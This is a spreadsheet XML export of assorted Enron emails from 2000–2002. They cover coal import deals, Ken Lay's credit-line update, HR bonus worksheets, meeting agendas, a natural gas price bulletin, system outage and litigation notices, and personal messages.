 Katrina Bensadon and Janet Wood with support from the coal and freight tea=_x000D_
ms._x000D_
_x000D_
In a separate agreement Enron's first foray into the US coal import market =_x000D_
is delivering a cargo of Colombian coal to Dynergy via the Mississippi and =_x000D_
two further cargoes of 45,000-60,000 tonnes to northeastern US utilities vi=_x000D_
a Charleston, south Carolina.  With coal supplying the fuel for more than h=_x000D_
alf of the USA's power generation and the domestic coal market showing high=_x000D_
 prices - the Nymex coal price has doubled over the past year - this is an =_x000D_
excellent time for Enron to help meet customer demand.  "This is a classic =_x000D_
Enron deal exploiting optionality," says Sam Grossman.  "We were able to re=_x000D_
direct one of our coal cargoes bound for Europe and find an alternative sou=_x000D_
rce to fulfill the European order."  The import agreement is expected to en=_x000D_
courage other counterparties into the US coal import market.  Congratulatio=_x000D_
ns to Sam, Peter Bradley, Lenny Hochschild and the Enron freight desk._x000D_
_x000D_
_x000D_
LEGAL STUFF_x000D_
The information contained in this newsletter is confidential and proprietar=_x000D_
y to Enron Corp. and its subsidiaries.  It is intended for internal use onl=_x000D_
y and should not be disclosed._x000D_
_x000D_
&lt;Embedded Paintbrush Picture&gt;</t>
  </si>
  <si>
    <t>Fri, 2 Nov 2001 06:09:22 -0800 (PST)</t>
  </si>
  <si>
    <t>FW: Daily Update</t>
  </si>
  <si>
    <t>You and all of Enron are in our prayers.  If I can I'd like to share a verse that found its way to me during my morning prayer time.  I hope it blesses you as well._x000D_
_x000D_
Psalm 121 (1-3)  I lift up my eyes to the hills where does my help come from?  My help comes from the Lord, the Maker of heaven and earth.  He will not let my foot slip.  _x000D_
_x000D_
I have prayed that God will stay close to your side and let you know that his works are most powerful when we need him the most._x000D_
_x000D_
God Bless_x000D_
Cb_x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Enron Announcements/Corp/Enron@ENRON   On Behalf Of Ken Lay- Chairman of the Board@ENRON_x000D_
Sent:	Thursday, November 01, 2001 11:15 AM_x000D_
To:	All Enron Worldwide@ENRON_x000D_
Subject:	Daily Update_x000D_
_x000D_
_x000D_
Today we announced another positive development in our efforts to regain shareholder and market confidence, strengthen our balance sheet and help maintain our credit rating._x000D_
_x000D_
We have executed a commitment letter with two of our longstanding banking partners, JPMorgan (the investment banking arm of JPMorgan Chase &amp; Co.) and Salomon Smith Barney (the investment banking arm of Citigroup Inc.), that will provide us with additional secured credit lines worth $1 billion.  Our Northern Natural Gas Company and Transwestern Pipeline Company will support these assets.  The proceeds will be used to supplement short-term liquidity and to refinance maturing obligations._x000D_
_x000D_
The pipelines are not being sold.  Enron is only using these assets for this new credit line.  Secured financing like this provides an expeditious way to increase liquidity and restore confidence.  We also have the capacity to increase this facility by an additional $200 million if we bring in additional banks to participate._x000D_
_x000D_
This money is in addition to the $3 billion in our credit lines we accessed last week to pay off short-term commercial debt and keep more than $1 billion in cash._x000D_
_x000D_
I know it is discouraging to read the negative media coverage about our company.  On a positive note, there was an editorial in last Sunday's Houston Chronicle that I want you to read:  &lt;http://www.chron.com/cs/CDA/story.hts/editorial/outlook/1107504&gt;.  This is an extremely difficult time for everyone and I appreciate everything you do for Enron._x000D_
_x000D_
Don't forget to read our voice mail and e-mail transcripts covering these developments on the Enron Updates intranet site at (&lt;http://home.enron.com/updates/&gt;)._x000D_
_x000D_
Thank you.</t>
  </si>
  <si>
    <t>Saturday</t>
  </si>
  <si>
    <t xml:space="preserve">Phil's birthday is the 21st, so I was thinking that I might want to have a _x000D_
birthday type dinner for him this Saturday.  Some place relatively casual but _x000D_
good food (I obviously have put a lot of thought into this).  I was thinking _x000D_
about dinner around 7:30.  Are you and Grant interested in joining us?  Julie _x000D_
is babysitting for us.  I am going to see if she can come over around 3 so _x000D_
Phil and I can also finish our Christmas shopping.  S._x000D_
_x000D_
Sheryl A. Gussett_x000D_
Bracewell &amp; Patterson, L.L.P._x000D_
711 Louisiana, Suite 2900_x000D_
Houston, Texas 77002-2781_x000D_
(713) 221-1210_x000D_
(713) 221-2132 (fax)_x000D_
sgussett@bracepatt.com_x000D_
</t>
  </si>
  <si>
    <t>Thu, 20 Dec 2001 09:29:47 -0800 (PST)</t>
  </si>
  <si>
    <t>RE: worksheets</t>
  </si>
  <si>
    <t xml:space="preserve">  _x000D_
_x000D_
_x000D_
Thanks,_x000D_
_x000D_
Fran_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	McCarty, Danny  _x000D_
Sent:	Thursday, December 20, 2001 11:27 AM_x000D_
To:	Fagan, Fran_x000D_
Subject:	RE: worksheets_x000D_
_x000D_
Fran,_x000D_
    If Julie's merit needs to be lump sum, just move it over to that column.  Also, send me Eric Gadd's sheets as well.  Thanks._x000D_
Dan_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Fagan, Fran  _x000D_
Sent:	Thursday, December 20, 2001 11:10 AM_x000D_
To:	McCarty, Danny_x000D_
Subject:	worksheets_x000D_
_x000D_
As discussed, attached are your sheets for bonus and merit._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Fran Fagan_x000D_
Sr. HR Rep_x000D_
713.853.5219_x000D_
_x000D_
_x000D_
 &lt;&lt; File: McCartyMerit.xls &gt;&gt;  &lt;&lt; File: mccartyBonusCommercial_UnP.xls &gt;&gt; _x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 15 Apr 2002 06:15:47 -0700 (PDT)</t>
  </si>
  <si>
    <t>I.D. Badges Charges / Plaza Java Coffee Kiosk</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
As Steve Cooper indicated in the employee meeting, we are undertaking efforts to improve the work environment at Enron.  Two such initiatives are being kicked off next week._x000D_
_x000D_
First, employees will be able to reinstate I.D. badge purchase privileges.  Beginning Tuesday, April 16, 2002, current Houston-based Enron employees will be able to activate their employee I.D. badge to make purchases at the Energizer, Express Store, and the Plaza Java Coffee kiosk.  Charges will be deducted directly from their paycheck._x000D_
_x000D_
To activate your I.D. badge for purchases, please follow the steps outlined below:  _x000D_
?	Complete a new I.D. badge charge form.  Forms may be picked up at any cash register in the Energizer, Express Store, and Plaza Java.  A printable form is attached below for your convenience.  _x000D_
?	Sign and date the form.  Doing so authorizes Payroll to deduct charges from your semi-monthly paychecks.  Unsigned and undated forms will be returned to the applicant.  _x000D_
?	Return the form to Richard Hensch at EB1653a, or to any cashier at the above locations._x000D_
?	Allow three days for activation.  _x000D_
_x000D_
Additionally, there is good news for coffee drinkers.  Beginning Monday, April 15, the operating hours for the Plaza Java coffee kiosk will be extended to 4:00 p.m. for a two-week trial basis.  During that time, participation will be monitored to determine whether the later closing time will be continued._x000D_
_x000D_
Questions may be referred to mailto:Richard.Hensch@enron.com.  _x000D_
_x000D_
 </t>
  </si>
  <si>
    <t>Wed, 28 Nov 2001 14:06:41 -0800 (PST)</t>
  </si>
  <si>
    <t>FW: Senior Position</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	craigjefferies@ckbenergy.com@ENRON  _x000D_
Sent:	Wednesday, November 28, 2001 11:50 AM_x000D_
To:	Carson, Mike_x000D_
Subject:	Senior Position_x000D_
_x000D_
Mike:_x000D_
_x000D_
Please send me your resume or call me. I have senior position that I would like to discuss._x000D_
_x000D_
Regards,_x000D_
_x000D_
Craig Jefferies_x000D_
President_x000D_
CKB Energy, Inc._x000D_
(917) 445 1189_x000D_
</t>
  </si>
  <si>
    <t>Sun, 5 Mar 2000 03:34:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'rex.shelby@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'jeff.skilling@enron.com', 'kevin.hannon@enron.com', 'joe.hirko@enron.com', 'ken.rice@enron.com'})</t>
  </si>
  <si>
    <t>IBM Meeting on Monday</t>
  </si>
  <si>
    <t xml:space="preserve">Hello --_x000D_
_x000D_
The IBM meeting on Monday at 12:30pm in Houston (49C1) is an informal working _x000D_
session meeting for the EBS/IBM ASP team rather than a major checkpoint _x000D_
meeting.  Therefore, you definitely do not need to attend.  However, you are _x000D_
certainly welcome to drop by at any time.  A few morale words about the _x000D_
importance of the effort and the size of the joint opportunity with IBM in _x000D_
the ASP space are always welcome if you get a chance to come by._x000D_
_x000D_
Jeff:  I got a call from Perminder Bindra on Saturday.  He says that the IBM _x000D_
team assigned to EBS is extremely excited.  His concern is that there are _x000D_
other ASP efforts with other companies going on in IBM, and he fears that the _x000D_
"normal" IBM noise level around these efforts could slow us down (our goal is _x000D_
an agreement this quarter).  So if you can stress our need for speed in your _x000D_
call with Sam P. tomorrow, that would be helpful.  I am hoping that IBM will _x000D_
treat EBS as the top ASP-related partnership that they develop.  Thanks for _x000D_
your help.  _x000D_
_x000D_
  Best regards._x000D_
_x000D_
-- Rex_x000D_
_x000D_
_x000D_
_x000D_
Proposed Agenda for Meeting Monday, March 6th_x000D_
_x000D_
I. Status of Each Bucket (call-in number needed for one hour commencing at _x000D_
12:30pm)_x000D_
A. Market Selection/Strategy_x000D_
1. Branding (deferred) (Steve Lonon, Mark Palmer)_x000D_
2. Value Proposition (15 minutes to review current draft) (Ed Merenda, Mike _x000D_
Haney)_x000D_
3. Announcement  (15 minutes to review current draft) (Steve Lonon, Rex _x000D_
Shelby)_x000D_
_x000D_
B. Financial Structure (5 minutes to review notes from 2/28 meeting) (Susan _x000D_
Boucher, Larry Lawyer)_x000D_
_x000D_
II. Commercial Agreement subgroup (1 hour, 30 minutes)_x000D_
 Attendance, ie: Rex Shelby, Jim Crowder, Bob Lowrey, Mark Bartram_x000D_
_x000D_
III. Team Wrap Up (30 minutes) (call in number needed for 30 minutes _x000D_
commencing at           3:00 pm), all attendees suggested_x000D_
_x000D_
Dial in will be available for those who can't make it in person: _x000D_
1-888-311-9051; Access code: 71343_x000D_
_x000D_
Purpose of meeting: to get status from each of the subgroups (Value _x000D_
Proposition, Commercial Agreement, Announcement, Marketing, etc.) and to sit _x000D_
with everyone face to face and review key issues._x000D_
_x000D_
Deliverables from meeting: (IBM-EBS key contacts are asked to put together _x000D_
2-3 powerpoint slides briefly highlighting the topics below)_x000D_
_x000D_
Outlook of each subgroup and where it fits into the March 31st deadline_x000D_
Status of each subgroup_x000D_
Potential roadblocks to March 31st deadline_x000D_
Go forward plan for April 1 and beyond _x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 7 Apr 2000 12:35:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>EES Implementation</t>
  </si>
  <si>
    <t>Message sent from the pjm-customer-info mailing list at _x000D_
pjm-customer-info@majordomo.pjm.com:_x000D_
_x000D_
Valued Customer:_x000D_
_x000D_
EES Production Cut-Over_x000D_
_x000D_
The production EES application will be made available to the registered users _x000D_
on_x000D_
Monday April 17, 2000 for day-ahead scheduling.  The production system will be_x000D_
preloaded with all schedules submitted through the current scheduling process _x000D_
to_x000D_
that point (PJM identifiers for these pre-loaded schedules will be provided_x000D_
through the usual scheduling practices).   Hourly schedules may be entered_x000D_
beginning April 18, 2000._x000D_
_x000D_
The Sandbox will be made unavailable at the time of production implementation._x000D_
Prior to April 17, the https://eestest.pjm.com URL will be reserved for the_x000D_
Sandbox.  Beginning April 17, the https://ees.pjm.com URL will point to the_x000D_
production EES application._x000D_
_x000D_
_x000D_
Registration_x000D_
_x000D_
Users with accounts on the Sandbox will automatically have accounts on the_x000D_
production system.  If you have not registered, please complete the_x000D_
authorization and registration forms located at_x000D_
http://www.pjm.com/ees/ees_index.html.  The contact designated on the EES_x000D_
authorization form will be faxed a list of user id's and passwords upon_x000D_
completion of the registration process._x000D_
_x000D_
_x000D_
EES Support_x000D_
_x000D_
PJM is enthusiastic about providing the responsive support you and your_x000D_
technical staff require.  Please contact our customer hotlines with your_x000D_
functional and technical inquiries._x000D_
_x000D_
* Functional Support: (610) 666 - 8980_x000D_
* Technical Support: (610) 666 - 8886_x000D_
* Email: eeshelp@pjm.com_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Questions may be directed to PJM Customer Service at (610) 666-8980._x000D_
_x000D_
To unsubscribe from this list, send an e-mail to majordomo@majordomo.pjm.com_x000D_
containing only the following line in the body of the e-mail:_x000D_
_x000D_
unsubscribe pjm-customer-info</t>
  </si>
  <si>
    <t>Mon, 22 Oct 2001 10:00:04 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                   IntercontinentalExchange                =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                            =20_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                   Firm Physical Natural Gas Price Bulletin                =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                            =20_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                   For Natural Gas Delivered on Tuesday, October   23, 2001=_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                  =20_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                   (Trade Date of Monday, October   22, 200=_x000D_
1)                                                                         =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                          =20_x000D_
Click here to access index history .                                       =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                    =20_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                   * volume represents sell-side only *    =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                          =20_x000D_
_x000D_
Region     Hub=09High=09Low=09Wtd Avg Index=09Change ($)=09Vol (mmBtu)=09Hu=_x000D_
b Name=09_x000D_
 LOUISIANA =09=09=09=09=09=09=09_x000D_
    ANR SE=09          $2.6550=09          $2.5000=09          $2.5882=09+ =_x000D_
   .3196=09         221,200=09American Natural Resources Pipeline Co. - SE =_x000D_
 Transmission Pool=09_x000D_
    Columbia Onshore=09          $2.6500=09          $2.5500=09          $2=_x000D_
.6042=09+    .3147=09         127,100=09Columbia Gulf Transmission Co. - On=_x000D_
shore Pool =09_x000D_
    Henry Hub=09          $2.7400=09          $2.5325=09          $2.6090=_x000D_
=09+    .3005=09         518,000=09Henry Hub tailgate - Louisiana =09_x000D_
    NGPL LA=09          $2.6975=09          $2.5150=09          $2.5949=09+=_x000D_
    .2945=09         190,000=09Natural Gas Pipeline Co. of America, Louisia=_x000D_
na Pool =09_x000D_
    Tenn 500L=09          $2.6400=09          $2.5000=09          $2.5304=_x000D_
=09+    .2725=09          92,600=09Tennessee Gas Pipeline Co.-Zone L, 500 L=_x000D_
eg Pool =09_x000D_
    Tenn 800L=09          $2.5800=09          $2.4850=09          $2.5184=_x000D_
=09+    .2804=09          59,300=09Tennessee Gas Pipeline Co.-Zone L, 800 L=_x000D_
eg Pool =09_x000D_
    TETCO ELA=09          $2.6500=09          $2.4900=09          $2.5476=_x000D_
=09+    .3025=09         156,400=09Texas Eastern - East LA =09_x000D_
    TETCO WLA=09          $2.5800=09          $2.5500=09          $2.5662=_x000D_
=09+    .3465=09          27,700=09Texas Eastern - West LA =09_x000D_
    Transco 65=09          $2.7300=09          $2.5950=09          $2.6474=_x000D_
=09+    .2890=09         156,300=09Transco - Station 65 =09_x000D_
    Trunkline ELA=09          $2.6050=09          $2.4900=09          $2.55=_x000D_
25=09+    .2995=09          61,400=09Trunkline Gas Company - East Louisiana=_x000D_
 Pool =09_x000D_
    TxGas SL=09          $2.7100=09          $2.5650=09          $2.6337=09=_x000D_
+    .2622=09          42,500=09Texas Gas Transmission Corp.-Zone SL FT Poo=_x000D_
l =09_x000D_
 MIDCONTINENT =09=09=09=09=09=09=09_x000D_
    MichCon, citygate=09          $2.8150=09          $2.7100=09          $=_x000D_
2.7741=09+    .3382=09         194,200=09Michigan Consolidated =09_x000D_
    NGPL Midcont=09          $2.6050=09          $2.4500=09          $2.534=_x000D_
2=09+    .3919=09         150,200=09Natural Gas Pipeline Co. of America, Mi=_x000D_
d-Continent Pool =09_x000D_
    NGPL Nicor, citygate=09          $2.7500=09          $2.6025=09        =_x000D_
  $2.6407=09+    .2934=09       1,011,200=09Natural Gas Pipeline Co. of Ame=_x000D_
rica, Nicor Citygate=09_x000D_
    NGPL NIPSCO, citygate=09          $2.7300=09          $2.6200=09       =_x000D_
   $2.6622=09+    .2815=09          45,000=09Natural Gas Pipeline Co. of Am=_x000D_
erica, Nipsco Citygate=09_x000D_
    NNG Demarcation=09          $2.6600=09          $2.5350=09          $2.=_x000D_
6232=09+    .4186=09         165,100=09Northern Natural Gas, Demarcation Po=_x000D_
ol =09_x000D_
 NORTHEAST =09=09=09=09=09=09=09_x000D_
    Columbia TCO=09          $2.7825=09          $2.6800=09          $2.724=_x000D_
3=09+    .2851=09         217,700=09Columbia Gas Co. - TCO Pool =09_x000D_
    Dominion So.Point=09          $2.7700=09          $2.6700=09          $=_x000D_
2.7206=09+    .2624=09         190,800=09Dominion - South Point =09_x000D_
    TETCO M3=09          $2.9050=09          $2.8100=09          $2.8551=09=_x000D_
+    .3286=09         261,300=09Texas Eastern - M3 Zone =09_x000D_
    Transco Z-6 (NY)=09          $2.9000=09          $2.8100=09          $2=_x000D_
.8352=09+    .3060=09         181,000=09Transcontinental Gas Pipe Line Corp=_x000D_
. - Zone 6 (NY)=09_x000D_
 WEST =09=09=09=09=09=09=09_x000D_
    El Paso non-Bondad=09          $2.4650=09          $2.2600=09          =_x000D_
$2.3571=09+    .4236=09         133,200=09El Paso - San Juan Basin, Blanco =_x000D_
Pool=09_x000D_
    Huntingdon/Sumas=09          $2.5650=09          $2.4400=09          $2=_x000D_
.4889=09+    .4865=09         163,000=09Westcoast Energy &amp; Northwest Pipeli=_x000D_
ne Corp.=09_x000D_
    Opal=09          $2.3250=09          $2.1900=09          $2.2640=09+   =_x000D_
 .4288=09          98,000=09Opal=09_x000D_
    PG?Citygate=09          $2.7000=09          $2.5700=09          $2.6379=_x000D_
=09+    .5257=09         112,000=09PG?- Citygate =09_x000D_
    SoCal Border=09          $2.6500=09          $2.5400=09          $2.582=_x000D_
9=09+    .4199=09          70,000=09Southern California Border Points (Ehre=_x000D_
nberg,Topock,Needles)=09_x000D_
 WEST TEXAS =09=09=09=09=09=09=09_x000D_
    El Paso - Keystone=09          $2.4800=09          $2.3450=09          =_x000D_
$2.4328=09+    .3989=09         323,100=09El Paso - Keystone Pool=09_x000D_
    Waha=09          $2.6050=09          $2.4000=09          $2.5075=09+   =_x000D_
 .3704=09         147,000=09Waha Hub - West Texas =09_x000D_
_x000D_
_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                   Includes all firm physical fixed price t=_x000D_
rades done from 7 AM to 11:30 AM Central Prevailing Time on the trade date =_x000D_
specified for natural gas delivered on the specified date(s).              =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
       =20_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                       IntercontinentalExchange is the world's most liquid =_x000D_
trading platform for over-the-counter energy and metals.  Active markets in=_x000D_
clude North American power and natural gas, global crude and refined oil pr=_x000D_
oducts, and precious metals.  Traded instruments include forwards, swaps, a=_x000D_
nd options.                                                                =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                            =20_x000D_
In order to receive the proprietary information contained in this email, yo=_x000D_
u acknowledge and agree that you shall not further disseminate the Intercon=_x000D_
tinentalExchange Market Data contained herein to any person or entity witho=_x000D_
ut the express written consent of IntercontinentalExchange.    Furthermore,=_x000D_
 you acknowledge that (1) IntercontinentalExchange has exclusive and valuab=_x000D_
le property rights in this data; (2) IntercontinentalExchange's data is bei=_x000D_
ng made available to you only for your own business or personal activities;=_x000D_
 and (3) you cannot communicate the data, in any form, to any other person =_x000D_
or entity without the express written consent of IntercontinentalExchange. =_x000D_
               =20_x000D_
This data is provided to you free of charge.  IntercontinentalExchange rese=_x000D_
rves the right to cancel this service at any time for any reason or no reas=_x000D_
on at all.                                                                 =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
               =20_x000D_
You agree that IntercontinentalExchange does not make any representations o=_x000D_
r warranties, express or implied, with respect to the data.                =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                         =20_x000D_
To become an Exchange Participant or inquire about the indices, please cont=_x000D_
act sales@intcx.com .                                                      =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                =20_x000D_
To unsubscribe from this service, click here unsubscribe .                 =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                         =_x000D_
=20_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                               ?Copyright IntercontinentalExchange, Inc. 20=_x000D_
01, All Rights Reserved.                                                   =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                      </t>
  </si>
  <si>
    <t>Wed, 19 Sep 2001 18:23:17 -0700 (PDT)</t>
  </si>
  <si>
    <t>Outage for Applications residing on the R:\ Drive</t>
  </si>
  <si>
    <t>All applications residing on the R: drive will be temporarily unavailable from Friday, September 21, 2001 at 11:00 P.M. until 11:30 PM for users logging into the CORP domain serviced by Enron Net Works.  The outage is needed to perform required system maintenance updates and give us better monitoring ability to ensure consistent and  efficient operations._x000D_
_x000D_
Any questions or concerns regarding this system outage can be directed to Michael S. White (713) 853-9001.  _x000D_
_x000D_
The following have been identified as business critical applications that will be affected by the outage:_x000D_
_x000D_
Sitara_x000D_
CMS_x000D_
Equity trading systems (R:\eqpm directory)_x000D_
Adaytum_x000D_
CQG_x000D_
TMS_x000D_
PowerMap Europe_x000D_
PowerDat Europe_x000D_
MapInfo Professional _x000D_
Secretariat</t>
  </si>
  <si>
    <t>Fri, 23 Jun 2000 07:54:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'lgibson@ogwb.com'})</t>
  </si>
  <si>
    <t>Re: Calpine depositions and other matters</t>
  </si>
  <si>
    <t xml:space="preserve">Thanks for the update. Are you getting everything you need from Linda?_x000D_
_x000D_
_x000D_
_x000D_
	"Laura Gibson" &lt;lgibson@ogwb.com&gt;_x000D_
	06/21/2000 03:38 PM_x000D_
	Please respond to lgibson_x000D_
		 _x000D_
		 To: "Richard Sanders" &lt;Richard.B.Sanders@Enron.com&gt;, "Elizabeth Sager" _x000D_
&lt;Elizabeth.Sager@enron.com&gt;, "David Portz" &lt;David.Portz@enron.com&gt;, "Linda R _x000D_
Guinn" &lt;Linda.R.Guinn@enron.com&gt;_x000D_
		 cc: "Bill Ogden" &lt;bogden@ogwb.com&gt;_x000D_
		 Subject: Calpine depositions and other matters_x000D_
_x000D_
_x000D_
I wanted to let each of you know that, in accordance with the discussions we_x000D_
had at our last meeting, I am sending out notices of deposition noticing the_x000D_
depositions of:_x000D_
1. Calpine's credit person;_x000D_
2. Calpine Corp.'s credit person;_x000D_
3. Steve Snow;_x000D_
4. Carey Jordan;_x000D_
5. Darrell Hayslip; and_x000D_
6. Paul Posoli._x000D_
_x000D_
The first deposition is scheduled to begin on July 18,2000._x000D_
_x000D_
Please let me know if you have any questions regarding the status of the_x000D_
lawsuit or if Bill Ogden or I can be of further assistance on this matter._x000D_
_x000D_
                                            Sincerely,_x000D_
_x000D_
                                            Laura Gibson_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 27 Nov 2001 04:55:59 -0800 (PST)</t>
  </si>
  <si>
    <t>daily charts 11/27</t>
  </si>
  <si>
    <t>The information contained herein is based on sources that we believe to be_x000D_
reliable, but we do not represent that it is accurate or complete.  Nothing_x000D_
contained herein should be considered as an offer to sell or a solicitation_x000D_
of an offer to buy any financial instruments discussed herein.  Any_x000D_
opinions expressed herein are solely those of the author.  As such, they_x000D_
may differ in material respects from those of, or expressed or published by_x000D_
on behalf of Carr Futures or its officers, directors, employees or_x000D_
affiliates.  ? 2001 Carr Futures_x000D_
_x000D_
_x000D_
The charts are now available on the web by clicking on the hot link(s)_x000D_
contained in this email. If for any reason you are unable to receive the_x000D_
charts via the web, please contact me via email and I will email the charts_x000D_
to you as attachments._x000D_
_x000D_
_x000D_
Crude     http://www.carrfut.com/research/Energy1/crude43.pdf_x000D_
Natural Gas     http://www.carrfut.com/research/Energy1/ngas43.pdf_x000D_
Distillate     http://www.carrfut.com/research/Energy1/hoil43.pdf_x000D_
Unleaded     http://www.carrfut.com/research/Energy1/unlded3.pdf_x000D_
_x000D_
